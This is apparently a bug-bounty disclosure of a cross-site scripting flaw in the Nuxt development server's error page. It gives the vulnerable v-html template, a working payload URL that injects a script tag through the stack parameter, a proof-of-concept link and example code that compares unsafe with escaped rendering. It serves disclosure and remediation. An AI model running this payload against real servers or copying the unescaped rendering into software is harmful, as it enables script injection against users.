huntr report 70AC720D-C932-4ED3-98B1-DD2CBCB90185 by ohb00
History: Oct 26, 2022 - 7:02 p.m.

Dev Server XSS

2022-10-26 19:02:56
ohb00
www.huntr.dev

Tags: developer server, xss, unsecured, stack trace, rendering, crafted request, nuxt, exploitation, proof of concept, bug bounty

EPSS: 0.001
Percentile: 30.2%

Description

The developer server unsafely renders the stack trace within errors. This can be manipulated by sending a specially crafted request.

Root Cause

The error-dev.vue template in @nuxt/ui-templates uses the v-html directive to render the stack-trace section of the error page. The template's attribute bindings were lost in extraction; the `v-html` binding on the `<pre>` element is the one the description refers to:

```html
  <h1 />
  <p />
  <div>
    <!-- stack trace inserted as raw HTML, not as escaped text -->
    <pre v-html="stack" />
  </div>
```

This would normally not be an issue; however, Nuxt provides a way to supply the stack trace via a specially crafted URL.

Exploitation

Navigating to `/__nuxt_error?stack=%0A<script>alert("xss!")</script>` will produce XSS.

The first line of the stack trace is removed before rendering, hence the leading `%0A` (a URL-encoded newline) to push the payload onto the second line.
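The rendering described above, modelled as an added example that is not Nuxt's own code: a hypothetical `renderStackUnsafe` reproduces the raw-HTML insertion of `<pre v-html="stack" />` (including the first-line removal), and `renderStackSafe` shows the fix of HTML-escaping the attacker-controlled string before it reaches the page, which is what text interpolation (`{{ stack }}`) would do. The query-string handling (`stackFromRequestUrl`) is an assumption about how the `stack` parameter reaches the template.

```javascript
// Added example (not Nuxt's code): minimal model of the dev error page's
// stack rendering, vulnerable form beside the escaped form.
// Assumption: the renderer receives the raw `stack` query parameter from
// `/__nuxt_error?stack=...` and drops its first line before display.

// Escape the characters that matter inside an element body or attribute.
// `&` must be replaced first so already-escaped output is not double-escaped.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Mirrors the behaviour in the report: the first line of the stack is removed.
function stripFirstLine(stack) {
  return stack.split("\n").slice(1).join("\n");
}

// Vulnerable: equivalent of `<pre v-html="stack" />`, the attacker-controlled
// string becomes live markup.
function renderStackUnsafe(stack) {
  return `<pre>${stripFirstLine(stack)}</pre>`;
}

// Hardened: escape before insertion, equivalent of `<pre>{{ stack }}</pre>`.
function renderStackSafe(stack) {
  return `<pre>${escapeHtml(stripFirstLine(stack))}</pre>`;
}

// Read the `stack` parameter the way a dev server would from the request URL.
// URLSearchParams percent-decodes the value (so %0A becomes a newline).
function stackFromRequestUrl(requestUrl) {
  return new URL(requestUrl, "http://localhost").searchParams.get("stack") || "";
}

// Constructed request using the report's payload.
const sampleUrl = '/__nuxt_error?stack=%0A<script>alert("xss!")</script>';
const sampleStack = stackFromRequestUrl(sampleUrl);
console.log(renderStackUnsafe(sampleStack)); // contains a real <script> element
console.log(renderStackSafe(sampleStack));   // the tag is shown as text
```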

Proof of Concept

https://stackblitz.com/github/nuxt/framework/tree/main/examples/essentials/hello-world?file=app.vue&theme=dark
Navigate to the URL `/__nuxt_error?stack=%0A<script>alert("xss!")</script>`
